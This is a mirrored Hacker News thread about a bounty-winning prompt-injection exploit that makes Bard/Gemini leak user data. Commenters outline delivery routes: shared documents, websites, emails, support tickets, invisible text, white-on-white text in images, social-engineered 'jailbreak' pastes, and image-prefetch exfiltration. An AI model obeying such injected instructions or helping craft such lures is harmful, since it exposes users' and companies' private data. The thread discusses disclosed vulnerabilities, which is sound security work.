| HN Mirror

Y	Hacker News new \| ask \| show \| jobs

by doakes 840 days ago

So is the idea (for the last/$20k one) that you would convince someone to paste your maliciously crafted prompt to steal their data?

The other post[0] of the same exploit is really interesting b/c it reads instructions from a document. So if someone had something like "find X in my documents" and you shared the malicious document with them, it could trigger those instructions.

[0] https://embracethered.com/blog/posts/2023/google-bard-data-e...

5 comments

tevon 840 days ago

It could likely also be injected via malicious websites, force-shared google docs etc.

If a unknowing user asks a simple question, and Gemini reaches out to a malicious website for an answer, the prompt could be injected.

Additionally it could be taken out of an email / doc that was previously sent to the innocent user if the user asked Gemini to search their email or docs or something.

Kind of crazy the number of delivery vectors there are for these connected LLMs

link

azherebtsov 840 days ago

I think the idea might be that companies who will decide to use bard under the hood of theirs chat bots/assistants may use Google suite extensively. Attacker will use the prompt from the article as an input to this custom chat bot and will have access to private Google workspace (corporate email, docs,…)

link

doakes 840 days ago

Ok, that makes a lot more sense. If a company provides a chat bot/assistant, you can trick it into exposing company data it has access to. Thanks

link

guessbest 840 days ago

Its seems like a combination of 90's seo spam pages combined with running unsigned/unchecked executables. I think we're going to have certifications and positions for AI Tools Security Officers in the near future if we don't already.

link

Klathmon 839 days ago

I'm also thinking of attacks similar to the recent okta attack where they gained access through a support employee.

I could see trying to get queries like this to show up in their internal tooling, show up in a support ticket, or somewhere like that.

Then the first time it's executed to see what the issue could be, it can exfiltrate any data it has access to!

link

vizzah 840 days ago

yeah, sounds like a "weird" vulnerability assuming it comes from a malicious text payload someone must deliberately insert into the own chat.

Hard to fathom $20k prize for that, to us old-schoolers, used to at least expect exploit delivery from an innocently-looking link.

link

moyix 840 days ago

Worth noting that you can use "invisible text" to give instructions to LLMs without it showing up in the chat box. So all you have to do is get someone to copy/paste one of those messages into their chat, and there are lots of ways you might be able to do this ("omg I figured out a cool new jailbreak that makes the model do anything you want!"). See here for more details:

https://news.ycombinator.com/item?id=39004822

https://twitter.com/goodside/status/1746685366952735034

link

cjbprime 839 days ago

Now that the models are multimodal, you can do it with images (e.g. white text on a white background) too.

link

kangabru 840 days ago

With all the hype around AI I'm sure people are trying out all sorts of products that could have vulnerabilities like this. For example, imagine a recruiter hooks up an AI product to auto-read their LinkedIn messages and evaluate candidates. An attacker would just have to contact them, get the AI to read something of theirs, and this prompt attack could expose private information about the recruiter and/or company. The attacker would just need the recruiter to view the image (or better yet, have the service prefetch the image) to expose the data.

link

sroussey 839 days ago

This sounds like a highly specific example. ;)

link

doakes 840 days ago

That was my thought. Since you could also convince them to paste "javascript:..." into their URL bar and that's not an issue to Google.

link

kccqzy 840 days ago

It's not weird in the sense that people are known to trick other people into opening the browser's JS console and pasting various things they don't understand. Things like "open Facebook then open the console and paste this to see whether your crush is stalking your profile" and people would actually do that. Of course the pasted script actually exfiltrates to the attacker a bunch of your private information.

link

lordswork 840 days ago

You could probably obfuscate the text payload and make it seem like a cool trick you'd want to try out yourself, like "Check out this prompt that generates these cool images with Gemini!" (cool images attached).

link